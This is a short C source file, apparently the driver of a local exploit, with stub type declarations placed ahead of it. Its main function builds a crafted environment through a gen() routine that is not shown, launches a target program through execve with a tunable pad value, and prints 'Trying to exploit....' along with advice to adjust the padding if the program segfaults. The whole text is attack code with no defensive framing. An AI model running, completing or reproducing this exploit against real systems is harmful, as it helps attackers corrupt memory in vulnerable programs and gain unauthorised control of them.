
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ROT ;
 unsigned long atoi (char*) ;
 int execve (char*,char**,char**) ;
 int exit (int ) ;
 char* gen (unsigned long) ;
 int printf (char*,...) ;
 int sprintf (char*,char*,int) ;
 int usage (char*) ;

main (int argc, char **argv)
{
  unsigned long pad = 0;
  int loop;
  char s[1000];
  char *nume[4], *pume[2];

  if (argc < 2)
    {
      usage (argv[0]);
      exit (0);
    }

  if (argv[2])
    pad = atoi (argv[2]);

  sprintf (s, "%d", ROT);

  nume[0] = argv[1];
  nume[1] = s;
  nume[2] = "add";
  nume[3] = ((void*)0);

  pume[0] = gen (pad);
  pume[1] = ((void*)0);

  printf ("Trying to exploit.... pad value: %d\n", pad);
  printf ("If you get a segfault, try to change the pad value !\n");

  execve (nume[0], nume, pume);
}
